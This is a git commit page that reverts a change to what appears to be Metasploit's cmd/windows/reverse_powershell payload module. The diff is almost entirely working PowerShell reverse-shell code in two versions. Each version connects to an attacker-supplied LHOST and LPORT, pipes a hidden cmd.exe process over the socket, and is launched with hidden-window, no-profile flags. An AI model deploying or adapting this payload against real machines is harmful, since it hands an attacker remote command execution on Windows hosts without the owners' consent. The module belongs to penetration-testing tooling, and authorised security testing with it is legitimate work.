Browse Source

Revert "Land #12945, fix the cmd/windows/reverse_powershell payload"

This reverts commit 564895e1a8, reversing
changes made to c1b2762b03.

This appears to make it worse.
bwatters-r7 1 month ago
parent
commit
9ef6110b54
1 changed files with 40 additions and 52 deletions
  1. 40
    52
      modules/payloads/singles/cmd/windows/reverse_powershell.rb

+ 40
- 52
modules/payloads/singles/cmd/windows/reverse_powershell.rb View File

@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
10 10
 
11 11
 module MetasploitModule
12 12
 
13
-  CachedSize = 1481
13
+  CachedSize = 1228
14 14
 
15 15
   include Msf::Payload::Single
16 16
   include Msf::Sessions::CommandShellOptions
@@ -57,57 +57,45 @@ module MetasploitModule
57 57
   def command_string
58 58
     lhost = datastore['LHOST']
59 59
     lport = datastore['LPORT']
60
-    powershell = %Q^
61
-$a='#{lhost}';
62
-$b=#{lport};
63
-$c=New-Object system.net.sockets.tcpclient;
64
-$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
65
-$ob=New-Object System.Byte[] 65536;
66
-$eb=New-Object System.Byte[] 65536;
67
-$e=new-object System.Text.UTF8Encoding;
68
-$p=New-Object System.Diagnostics.Process;
69
-$p.StartInfo.FileName='cmd.exe';
70
-$p.StartInfo.RedirectStandardInput=1;
71
-$p.StartInfo.RedirectStandardOutput=1;
72
-$p.StartInfo.RedirectStandardError=1;
73
-$p.StartInfo.UseShellExecute=0;
74
-$q=$p.Start();
75
-$is=$p.StandardInput;
76
-$os=$p.StandardOutput;
77
-$es=$p.StandardError;
78
-$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
79
-$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);
80
-$c.connect($a,$b);
81
-$s=$c.GetStream();
82
-while ($true) {
83
-    start-sleep -m 100;
84
-    if ($osread.IsCompleted -and $osread.Result -ne 0) {
85
-      $s.Write($ob,0,$osread.Result);
86
-      $s.Flush();
87
-      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
88
-    }
89
-    if ($esread.IsCompleted -and $esread.Result -ne 0) {
90
-      $s.Write($eb,0,$esread.Result);
91
-      $s.Flush();
92
-      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);
93
-    }
94
-    if ($s.DataAvailable) {
95
-      $r=$s.Read($nb,0,$nb.Length);
96
-      if ($r -lt 1) {
97
-          break;
98
-      } else {
99
-          $str=$e.GetString($nb,0,$r);
100
-          $is.write($str);
101
-      }
102
-    }
103
-    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
104
-        break;
105
-    };
106
-    if ($p.ExitCode -ne $null) {
107
-        break;
108
-    };
109
-};
110
-^.gsub!("\n", "")
60
+    powershell = "function RSC{"\
61
+          "if ($c.Connected -eq $true) {$c.Close()};"\
62
+          "if ($p.ExitCode -ne $null) {$p.Close()};"\
63
+          "exit;"\
64
+        "};"\
65
+        "$a='#{lhost}';$p='#{lport}';$c=New-Object system.net.sockets.tcpclient;"\
66
+        "$c.connect($a,$p);$s=$c.GetStream();"\
67
+        "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"\
68
+        "$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"\
69
+        "$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"\
70
+        "$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"\
71
+        "$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"\
72
+        "while($os.Peek() -ne -1){"\
73
+          "$o += $e.GetString($os.Read())"\
74
+        "};"\
75
+        "$s.Write($e.GetBytes($o),0,$o.Length);"\
76
+        "$o=$null;$d=$false;$t=0;"\
77
+        "while (-not $d) {"\
78
+          "if ($c.Connected -ne $true) {RSC};"\
79
+          "$pos=0;$i=1; "\
80
+          "while (($i -gt 0) -and ($pos -lt $nb.Length)) {"\
81
+            "$r=$s.Read($nb,$pos,$nb.Length - $pos);"\
82
+            "$pos+=$r;"\
83
+            "if (-not $pos -or $pos -eq 0) {RSC};"\
84
+            "if ($nb[0..$($pos-1)] -contains 10) {break}};"\
85
+            "if ($pos -gt 0){"\
86
+              "$str=$e.GetString($nb,0,$pos);"\
87
+              "$is.write($str);start-sleep 1;"\
88
+              "if ($p.ExitCode -ne $null){RSC}else{"\
89
+                "$o=$e.GetString($os.Read());"\
90
+                "while($os.Peek() -ne -1){"\
91
+                  "$o += $e.GetString($os.Read());"\
92
+                  "if ($o -eq $str) {$o=''}"\
93
+                "};"\
94
+                "$s.Write($e.GetBytes($o),0,$o.length);"\
95
+                "$o=$null;"\
96
+                "$str=$null"\
97
+              "}"\
98
+            "}else{RSC}};"\
111 99
 
112 100
     "powershell -w hidden -nop -c #{powershell}"
113 101
   end

Loading…
Cancel
Save